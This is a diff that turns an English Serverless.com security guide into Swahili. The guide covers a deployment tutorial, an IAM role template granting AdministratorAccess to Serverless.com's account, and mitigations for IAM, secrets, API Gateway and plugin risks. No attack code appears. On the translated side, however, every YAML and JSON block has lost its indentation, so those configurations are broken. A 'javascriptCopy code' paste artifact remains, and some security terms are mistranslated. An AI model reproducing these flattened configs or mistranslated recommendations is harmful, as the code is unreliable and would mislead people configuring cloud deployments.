```yaml
plugins:
- - serverless-webpack
+- serverless-webpack
```
-
Hooks
-**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments.
-
+**Hooks** hukuruhusu kuendesha skripti au amri maalum katika hatua maalum za mzunguko wa maisha ya kutekeleza. Zinapangwa kwa kutumia plugins au ndani ya `serverless.yml` ili kutekeleza vitendo kabla au baada ya kutekeleza.
```yaml
custom:
- hooks:
- before:deploy:deploy: echo "Starting deployment..."
+hooks:
+before:deploy:deploy: echo "Starting deployment..."
```
-
### Tutorial
-This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial):
-
-1. Create an AWS account (Serverless.com start in AWS infrastructure)
-2. Create an account in serverless.com
-3. Create an app:
+Hii ni muhtasari wa mafunzo rasmi [**kutoka kwenye hati**](https://www.serverless.com/framework/docs/tutorial):
+1. Unda akaunti ya AWS (Serverless.com inaanza katika miundombinu ya AWS)
+2. Unda akaunti katika serverless.com
+3. Unda programu:
```bash
# Create temp folder for the tutorial
mkdir /tmp/serverless-tutorial
@@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API)
## Create A New App
## Indicate a name like "tutorialapp)
```
-
-This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function:
+Hii inapaswa kuwa imetengeneza **app** inayoitwa `tutorialapp` ambayo unaweza kuangalia katika [serverless.com](serverless.com-security.md) na folda inayoitwa `Tutorial` yenye faili **`handler.js`** inayokuwa na baadhi ya msimbo wa JS wenye msimbo wa `helloworld` na faili **`serverless.yml`** ikitangaza kazi hiyo:
{{#tabs }}
{{#tab name="handler.js" }}
-
```javascript
exports.hello = async (event) => {
- return {
- statusCode: 200,
- body: JSON.stringify({
- message: "Go Serverless v4! Your function executed successfully!",
- }),
- }
+return {
+statusCode: 200,
+body: JSON.stringify({
+message: "Go Serverless v4! Your function executed successfully!",
+}),
+}
}
```
-
{{#endtab }}
{{#tab name="serverless.yml" }}
-
```yaml
# "org" ensures this Service is used with the correct Serverless Framework Access Key.
org: testing12342
@@ -342,130 +309,122 @@ app: tutorialapp
service: Tutorial
provider:
- name: aws
- runtime: nodejs20.x
+name: aws
+runtime: nodejs20.x
functions:
- hello:
- handler: handler.hello
- events:
- - httpApi:
- path: /
- method: get
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
```
-
{{#endtab }}
{{#endtabs }}
-4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
- 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
- 2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role.
+4. Unda mtoa huduma wa AWS, ukitembea kwenye **dashibodi** katika `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
+1. Ili kutoa `serverless.com` ufikiaji wa AWS itahitaji kuendesha stack ya cloudformation ikitumia faili hii ya usanidi (wakati wa kuandika hii): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
+2. Kiolezo hiki kinaunda jukumu linaloitwa **`SFRole-`** lenye **`arn:aws:iam::aws:policy/AdministratorAccess`** juu ya akaunti yenye Kitambulisho cha Kuamini kinachoruhusu akaunti ya `Serverless.com` ya AWS kufikia jukumu hilo.
Yaml roleTemplate
-
```yaml
Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments.
Resources:
- SFRole:
- Type: AWS::IAM::Role
- Properties:
- AssumeRolePolicyDocument:
- Version: "2012-10-17"
- Statement:
- - Effect: Allow
- Principal:
- AWS: arn:aws:iam::486128539022:root
- Action:
- - sts:AssumeRole
- Condition:
- StringEquals:
- sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
- Path: /
- RoleName: !Ref RoleName
- ManagedPolicyArns:
- - arn:aws:iam::aws:policy/AdministratorAccess
- ReporterFunction:
- Type: Custom::ServerlessFrameworkReporter
- Properties:
- ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
- OrgUid: !Ref OrgUid
- RoleArn: !GetAtt SFRole.Arn
- Alias: !Ref Alias
+SFRole:
+Type: AWS::IAM::Role
+Properties:
+AssumeRolePolicyDocument:
+Version: "2012-10-17"
+Statement:
+- Effect: Allow
+Principal:
+AWS: arn:aws:iam::486128539022:root
+Action:
+- sts:AssumeRole
+Condition:
+StringEquals:
+sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
+Path: /
+RoleName: !Ref RoleName
+ManagedPolicyArns:
+- arn:aws:iam::aws:policy/AdministratorAccess
+ReporterFunction:
+Type: Custom::ServerlessFrameworkReporter
+Properties:
+ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
+OrgUid: !Ref OrgUid
+RoleArn: !GetAtt SFRole.Arn
+Alias: !Ref Alias
Outputs:
- SFRoleArn:
- Description: "ARN for the IAM Role used by Serverless Framework"
- Value: !GetAtt SFRole.Arn
+SFRoleArn:
+Description: "ARN for the IAM Role used by Serverless Framework"
+Value: !GetAtt SFRole.Arn
Parameters:
- OrgUid:
- Description: Serverless Framework Org Uid
- Type: String
- Alias:
- Description: Serverless Framework Provider Alias
- Type: String
- RoleName:
- Description: Serverless Framework Role Name
- Type: String
+OrgUid:
+Description: Serverless Framework Org Uid
+Type: String
+Alias:
+Description: Serverless Framework Provider Alias
+Type: String
+RoleName:
+Description: Serverless Framework Role Name
+Type: String
```
-
-Trust Relationship
-
+Uhusiano wa Kuamini
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::486128539022:root"
- },
- "Action": "sts:AssumeRole",
- "Condition": {
- "StringEquals": {
- "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
- }
- }
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::486128539022:root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
+}
+}
+}
+]
}
```
-
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas.
+5. Mafunzo yanahitaji kuunda faili `createCustomer.js` ambayo kimsingi itaunda kiunganishi kipya cha API kinachoshughulikiwa na faili mpya ya JS na yanahitaji kubadilisha faili `serverless.yml` ili kufanya iweze kuunda **meza mpya ya DynamoDB**, kufafanua **kigezo cha mazingira**, jukumu ambalo litakuwa likitumia lambdas zilizozalishwa.
{{#tabs }}
{{#tab name="createCustomer.js" }}
-
```javascript
"use strict"
const AWS = require("aws-sdk")
module.exports.createCustomer = async (event) => {
- const body = JSON.parse(Buffer.from(event.body, "base64").toString())
- const dynamoDb = new AWS.DynamoDB.DocumentClient()
- const putParams = {
- TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
- Item: {
- primary_key: body.name,
- email: body.email,
- },
- }
- await dynamoDb.put(putParams).promise()
- return {
- statusCode: 201,
- }
+const body = JSON.parse(Buffer.from(event.body, "base64").toString())
+const dynamoDb = new AWS.DynamoDB.DocumentClient()
+const putParams = {
+TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
+Item: {
+primary_key: body.name,
+email: body.email,
+},
+}
+await dynamoDb.put(putParams).promise()
+return {
+statusCode: 201,
+}
}
```
-
{{#endtab }}
{{#tab name="serverless.yml" }}
-
```yaml
# "org" ensures this Service is used with the correct Serverless Framework Access Key.
org: testing12342
@@ -475,388 +434,379 @@ app: tutorialapp
service: Tutorial
provider:
- name: aws
- runtime: nodejs20.x
- environment:
- DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
- iam:
- role:
- statements:
- - Effect: "Allow"
- Action:
- - "dynamodb:PutItem"
- - "dynamodb:Get*"
- - "dynamodb:Scan*"
- - "dynamodb:UpdateItem"
- - "dynamodb:DeleteItem"
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+name: aws
+runtime: nodejs20.x
+environment:
+DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
+iam:
+role:
+statements:
+- Effect: "Allow"
+Action:
+- "dynamodb:PutItem"
+- "dynamodb:Get*"
+- "dynamodb:Scan*"
+- "dynamodb:UpdateItem"
+- "dynamodb:DeleteItem"
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
functions:
- hello:
- handler: handler.hello
- events:
- - httpApi:
- path: /
- method: get
- createCustomer:
- handler: createCustomer.createCustomer
- events:
- - httpApi:
- path: /
- method: post
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
+createCustomer:
+handler: createCustomer.createCustomer
+events:
+- httpApi:
+path: /
+method: post
resources:
- Resources:
- CustomerTable:
- Type: AWS::DynamoDB::Table
- Properties:
- AttributeDefinitions:
- - AttributeName: primary_key
- AttributeType: S
- BillingMode: PAY_PER_REQUEST
- KeySchema:
- - AttributeName: primary_key
- KeyType: HASH
- TableName: ${self:service}-customerTable-${sls:stage}
+Resources:
+CustomerTable:
+Type: AWS::DynamoDB::Table
+Properties:
+AttributeDefinitions:
+- AttributeName: primary_key
+AttributeType: S
+BillingMode: PAY_PER_REQUEST
+KeySchema:
+- AttributeName: primary_key
+KeyType: HASH
+TableName: ${self:service}-customerTable-${sls:stage}
```
-
{{#endtab }}
{{#endtabs }}
-6. Deploy it running **`serverless deploy`**
- 1. The deployment will be performed via a CloudFormation Stack
- 2. Note that the **lambdas are exposed via API gateway** and not via direct URLs
-7. **Test it**
- 1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed
+6. Tumia **`serverless deploy`**
+1. Utekelezaji utafanywa kupitia CloudFormation Stack
+2. Kumbuka kwamba **lambdas zinapatikana kupitia API gateway** na si kupitia URLs za moja kwa moja
+7. **Jaribu**
+1. Hatua ya awali itachapisha **URLs** ambapo kazi za lambda za mwisho wa API zako zimewekwa
-## Security Review of Serverless.com
+## Mapitio ya Usalama wa Serverless.com
-### **Misconfigured IAM Roles and Permissions**
+### **Mifumo na Ruhusa za IAM Zilizokosewa**
-Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation.
+Mifumo ya IAM iliyo na ruhusa nyingi inaweza kutoa ufikiaji usioidhinishwa kwa rasilimali za wingu, na kusababisha uvujaji wa data au upotoshaji wa rasilimali.
-When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like:
+Wakati hakuna ruhusa zilizotajwa kwa kazi ya Lambda, mfumo wenye ruhusa za kuzalisha tu kumbukumbu utaundwa, kama:
-Minimum lambda permissions
-
+Ruhusa za chini za lambda
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Action": [
- "logs:CreateLogStream",
- "logs:CreateLogGroup",
- "logs:TagResource"
- ],
- "Resource": [
- "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
- ],
- "Effect": "Allow"
- },
- {
- "Action": ["logs:PutLogEvents"],
- "Resource": [
- "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
- ],
- "Effect": "Allow"
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Action": [
+"logs:CreateLogStream",
+"logs:CreateLogGroup",
+"logs:TagResource"
+],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
+],
+"Effect": "Allow"
+},
+{
+"Action": ["logs:PutLogEvents"],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
+],
+"Effect": "Allow"
+}
+]
}
```
-
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Principle of Least Privilege:** Assign only necessary permissions to each function.
-
- ```yaml
- provider:
- [...]
- iam:
- role:
- statements:
- - Effect: 'Allow'
- Action:
- - 'dynamodb:PutItem'
- - 'dynamodb:Get*'
- - 'dynamodb:Scan*'
- - 'dynamodb:UpdateItem'
- - 'dynamodb:DeleteItem'
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
- ```
-
-- **Use Separate Roles:** Differentiate roles based on function requirements.
-
----
-
-### **Insecure Secrets and Configuration Management**
-
-Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised.
-
-The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**!
-
-> [!CAUTION]
-> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!**
-
-For example, the following example will use SSM to get an environment variable:
+- **Kanuni ya Haki Ndogo:** Panga ruhusa zinazohitajika tu kwa kila kazi.
```yaml
provider:
- environment:
- DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
```
+- **Tumia Majukumu Mbalimbali:** Tofautisha majukumu kulingana na mahitaji ya kazi.
+
+---
+
+### **Siri zisizo Salama na Usimamizi wa Mipangilio**
+
+Kuhifadhi taarifa nyeti (mfano, funguo za API, akidi za database) moja kwa moja katika **`serverless.yml`** au msimbo kunaweza kusababisha kufichuliwa ikiwa hifadhi zitashambuliwa.
+
+Njia **iliyopendekezwa** ya kuhifadhi mabadiliko ya mazingira katika faili ya **`serverless.yml`** kutoka serverless.com (wakati wa kuandika hii) ni kutumia watoa huduma wa `ssm` au `s3`, ambao unaruhusu kupata **maadili ya mazingira kutoka vyanzo hivi wakati wa kutekeleza** na **kuunda** mabadiliko ya mazingira ya **lambdas** na **maandishi yasiyo na maadili**!
+
+> [!CAUTION]
+> Hivyo, mtu yeyote mwenye ruhusa ya kusoma mipangilio ya lambdas ndani ya AWS ataweza **kufikia mabadiliko haya yote ya mazingira kwa maandiko wazi!**
+
+Kwa mfano, mfano ufuatao utatumia SSM kupata mabadiliko ya mazingira:
+```yaml
+provider:
+environment:
+DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+```
And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**.
> [!TIP]
-> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**.
+> Njia inayopendekezwa ya kuhifadhi mabadiliko ya mazingira kwa kutumia serveless.com ingekuwa **kuhifadhi katika siri ya AWS** na kuhifadhi tu jina la siri katika mabadiliko ya mazingira na **kodhi ya lambda inapaswa kukusanya hiyo**.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.**
-- **Encrypted Variables:** Leverage Serverless Frameworkās encryption features for sensitive data.
-- **Access Controls:** Restrict access to secrets based on roles.
+- **Ushirikiano wa Meneja wa Siri:** Tumia huduma kama **AWS Secrets Manager.**
+- **Mabadiliko Yaliyosimbwa:** Tumia vipengele vya usimbaji vya Serverless Framework kwa data nyeti.
+- **Udhibiti wa Ufikiaji:** Punguza ufikiaji wa siri kulingana na majukumu.
---
-### **Vulnerable Code and Dependencies**
+### **Msimbo na Kazi Zenye Ukatili**
-Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks.
+Kazi au utegemezi zisizokuwa na usalama zinaweza kuleta udhaifu, wakati usimamizi mbaya wa ingizo unaweza kusababisha mashambulizi ya kuingiza msimbo.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities.
+- **Usimamizi wa Utegemezi:** Sasisha mara kwa mara utegemezi na scan kwa udhaifu.
- ```yaml
- plugins:
- - serverless-webpack
- - serverless-plugin-snyk
- ```
+```yaml
+plugins:
+- serverless-webpack
+- serverless-plugin-snyk
+```
-- **Input Validation:** Implement strict validation and sanitization of all inputs.
-- **Code Reviews:** Conduct thorough reviews to identify security flaws.
-- **Static Analysis:** Use tools to detect vulnerabilities in the codebase.
+- **Uthibitishaji wa Ingizo:** Tekeleza uthibitishaji mkali na usafi wa ingizo zote.
+- **Mapitio ya Msimbo:** Fanya mapitio ya kina ili kubaini kasoro za usalama.
+- **Analizi ya Kijamii:** Tumia zana kugundua udhaifu katika msingi wa msimbo.
---
-### **Inadequate Logging and Monitoring**
+### **Kukosa Kurekodi na Kufuata**
-Without proper logging and monitoring, malicious activities may go undetected, delaying incident response.
+Bila kurekodi na kufuatilia vizuri, shughuli za uhalifu zinaweza kukosa kugunduliwa, kuchelewesha majibu ya tukio.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**.
+- **Kurekodi Kati:** Punguza kumbukumbu kwa kutumia huduma kama **AWS CloudWatch** au **Datadog**.
- ```yaml
- plugins:
- - serverless-plugin-datadog
- ```
+```yaml
+plugins:
+- serverless-plugin-datadog
+```
-- **Enable Detailed Logging:** Capture essential information without exposing sensitive data.
-- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies.
-- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents.
+- **Washa Kurekodi Kwa Kina:** Pata taarifa muhimu bila kufichua data nyeti.
+- **Weka Arifa:** Sanidi arifa kwa shughuli au tofauti za kushangaza.
+- **Kufuata Mara kwa Mara:** Fuata mara kwa mara kumbukumbu na vipimo kwa matukio ya usalama yanayoweza kutokea.
---
-### **Insecure API Gateway Configurations**
+### **Mikakati ya API Gateway Isiyo Salama**
-Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks.
+APIs zilizo wazi au zisizo salama zinaweza kutumika kwa ufikiaji usioidhinishwa, mashambulizi ya Denial of Service (DoS), au mashambulizi ya tovuti.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT.
+- **Uthibitishaji na Uidhinishaji:** Tekeleza mifumo thabiti kama OAuth, funguo za API, au JWT.
- ```yaml
- functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- authorizer: aws_iam
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+authorizer: aws_iam
+```
-- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates.
+- **Kukataza Kiwango na Kuchelewesha:** Zuia matumizi mabaya kwa kupunguza viwango vya maombi.
- ```yaml
- provider:
- apiGateway:
- throttle:
- burstLimit: 200
- rateLimit: 100
- ```
+```yaml
+provider:
+apiGateway:
+throttle:
+burstLimit: 200
+rateLimit: 100
+```
-- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers.
+- **Sanidi CORS Salama:** Punguza asili, mbinu, na vichwa vinavyoruhusiwa.
- ```yaml
- functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- cors:
- origin: https://yourdomain.com
- headers:
- - Content-Type
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+cors:
+origin: https://yourdomain.com
+headers:
+- Content-Type
+```
-- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns.
+- **Tumia Firewalls za Programu za Mtandao (WAF):** Chuja na fuatilia maombi ya HTTP kwa mifumo ya uhalifu.
---
-### **Insufficient Function Isolation**
+### **Kukosa Kutengwa kwa Kazi**
-Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions.
+Rasilimali zinazoshirikiwa na kutengwa kwa kutosha kunaweza kusababisha kupanda kwa mamlaka au mwingiliano usio na makusudi kati ya kazi.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation.
-- **Resource Partitioning:** Use separate databases or storage buckets for different functions.
-- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation.
+- **Tenga Kazi:** Panga rasilimali tofauti na majukumu ya IAM ili kuhakikisha uendeshaji huru.
+- **Kugawanya Rasilimali:** Tumia hifadhidata tofauti au ndoo za kuhifadhi kwa kazi tofauti.
+- **Tumia VPCs:** Weka kazi ndani ya Mifumo ya Kibinafsi ya Mtandao kwa kutengwa kwa mtandao iliyoimarishwa.
- ```yaml
- provider:
- vpc:
- securityGroupIds:
- - sg-xxxxxxxx
- subnetIds:
- - subnet-xxxxxx
- ```
+```yaml
+provider:
+vpc:
+securityGroupIds:
+- sg-xxxxxxxx
+subnetIds:
+- subnet-xxxxxx
+```
-- **Limit Function Permissions:** Ensure functions cannot access or interfere with each otherās resources unless explicitly required.
+- **Punguza Ruhusa za Kazi:** Hakikisha kazi haziwezi kufikia au kuingilia rasilimali za kila mmoja isipokuwa inahitajika wazi.
---
-### **Inadequate Data Protection**
+### **Kukosa Ulinzi wa Data**
-Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering.
+Data isiyosimbwa katika hali ya kupumzika au katika usafiri inaweza kufichuliwa, ikisababisha uvunjaji wa data au uharibifu.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Encrypt Data at Rest:** Utilize cloud service encryption features.
+- **Simbua Data Katika Hali ya Kupumzika:** Tumia vipengele vya usimbaji vya huduma za wingu.
- ```yaml
- resources:
- Resources:
- MyDynamoDBTable:
- Type: AWS::DynamoDB::Table
- Properties:
- SSESpecification:
- SSEEnabled: true
- ```
+```yaml
+resources:
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+SSESpecification:
+SSEEnabled: true
+```
-- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions.
-- **Secure API Communication:** Enforce encryption protocols and validate certificates.
-- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly.
+- **Simbua Data Katika Usafiri:** Tumia HTTPS/TLS kwa usafiri wote wa data.
+- **Wasiliana kwa API Salama:** Lazimisha itifaki za usimbaji na kuthibitisha vyeti.
+- **Simamisha Funguo za Usimbaji kwa Usalama:** Tumia huduma za funguo zinazodhibitiwa na kubadilisha funguo mara kwa mara.
---
-### **Lack of Proper Error Handling**
+### **Kukosa Usimamizi wa Makosa Sahihi**
-Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes.
+Ujumbe wa makosa wa kina unaweza kufichua taarifa nyeti kuhusu miundombinu au msingi wa msimbo, wakati makosa yasiyoshughulikiwa yanaweza kusababisha kuanguka kwa programu.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Generic Error Messages:** Avoid exposing internal details in error responses.
+- **Ujumbe wa Makosa ya Jumla:** Epuka kufichua maelezo ya ndani katika majibu ya makosa.
- ```javascript
- javascriptCopy code// Example in Node.js
- exports.hello = async (event) => {
- try {
- // Function logic
- } catch (error) {
- console.error(error);
- return {
- statusCode: 500,
- body: JSON.stringify({ message: 'Internal Server Error' }),
- };
- }
- };
- ```
+```javascript
+javascriptCopy code// Mfano katika Node.js
+exports.hello = async (event) => {
+try {
+// Mantiki ya kazi
+} catch (error) {
+console.error(error);
+return {
+statusCode: 500,
+body: JSON.stringify({ message: 'Internal Server Error' }),
+};
+}
+};
+```
-- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions.
-- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users.
+- **Usimamizi wa Makosa Kati:** Simamia na safisha makosa kwa njia ya kawaida katika kazi zote.
+- **Fuatilia na Kurekodi Makosa:** Fuata na changanua makosa ndani bila kufichua maelezo kwa watumiaji wa mwisho.
---
-### **Insecure Deployment Practices**
+### **Mikakati ya Utekelezaji Isiyo Salama**
-Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations.
+Mikakati ya utekelezaji iliyofichuliwa au ufikiaji usioidhinishwa kwa mabomba ya CI/CD inaweza kusababisha utekelezaji wa msimbo wa uhalifu au mipangilio isiyo sahihi.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits.
-- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data.
-- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies.
-- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices.
+- **Salama Mabomba ya CI/CD:** Tekeleza udhibiti mkali wa ufikiaji, uthibitishaji wa hatua nyingi (MFA), na ukaguzi wa mara kwa mara.
+- **Hifadhi Mipangilio kwa Usalama:** Hifadhi faili za utekelezaji bila siri zilizofichwa na data nyeti.
+- **Tumia Zana za Usalama za Miundombinu kama Msimbo (IaC):** Tumia zana kama **Checkov** au **Terraform Sentinel** kutekeleza sera za usalama.
+- **Utekelezaji Usio Badilika:** Zuia mabadiliko yasiyoidhinishwa baada ya utekelezaji kwa kupitisha mazoea ya miundombinu isiyobadilika.
---
-### **Vulnerabilities in Plugins and Extensions**
+### **Udhaifu katika Plugins na Nyongeza**
-Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications.
+Kutumia plugins za tatu zisizokaguliwa au zenye uhalifu kunaweza kuleta udhaifu katika programu zako za serverless.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources.
-- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface.
-- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches.
-- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises.
+- **Kagua Plugins kwa Kina:** Kadiria usalama wa plugins kabla ya kuingizwa, ukipendelea zile kutoka vyanzo vinavyoaminika.
+- **Punguza Matumizi ya Plugins:** Tumia tu plugins zinazohitajika ili kupunguza uso wa shambulio.
+- **Fuatilia Sasisho za Plugins:** Hifadhi plugins zikiwa na sasisho ili kufaidika na patches za usalama.
+- **Tenga Mazingira ya Plugins:** Endesha plugins katika mazingira yaliyotengwa ili kudhibiti hatari zinazoweza kutokea.
---
-### **Exposure of Sensitive Endpoints**
+### **Kufichua kwa Mipangilio Nyeti**
-Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations.
+Kazi zinazopatikana kwa umma au APIs zisizo na mipaka zinaweza kutumika kwa shughuli zisizoidhinishwa.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources.
-- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization.
-- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting.
-- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use.
+- **Punguza Ufikiaji wa Kazi:** Tumia VPCs, vikundi vya usalama, na sheria za moto ili kupunguza ufikiaji kwa vyanzo vinavyoaminika.
+- **Tekeleza Uthibitishaji Thabiti:** Hakikisha kwamba mipangilio yote iliyofichuliwa inahitaji uthibitishaji na uidhinishaji sahihi.
+- **Tumia Mabango ya API kwa Usalama:** Sanidi Mabango ya API kutekeleza sera za usalama, ikiwa ni pamoja na uthibitishaji wa ingizo na kukataza kiwango.
+- **Zima Mipangilio Isiyotumika:** Kagua mara kwa mara na zima mipangilio yoyote ambayo haitumiki tena.
---
-### **Excessive Permissions for Team Members and External Collaborators**
+### **Ruhusa Kupita Kiasi kwa Wajumbe wa Timu na Washirikishi wa Nje**
-Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats.
+Kutoa ruhusa kupita kiasi kwa wajumbe wa timu na washirikishi wa nje kunaweza kusababisha ufikiaji usioidhinishwa, uvunjaji wa data, na matumizi mabaya ya rasilimali. Hatari hii inaongezeka katika mazingira ambapo watu wengi wana viwango tofauti vya ufikiaji, ikiongeza uso wa shambulio na uwezekano wa vitisho vya ndani.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks.
+- **Kanuni ya Ruhusa Ndogo:** Hakikisha kwamba wajumbe wa timu na washirikishi wana ruhusa tu zinazohitajika kutekeleza majukumu yao.
---
-### **Access Keys and License Keys Security**
+### **Usalama wa Funguo za Ufikiaji na Funguo za Leseni**
-**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI.
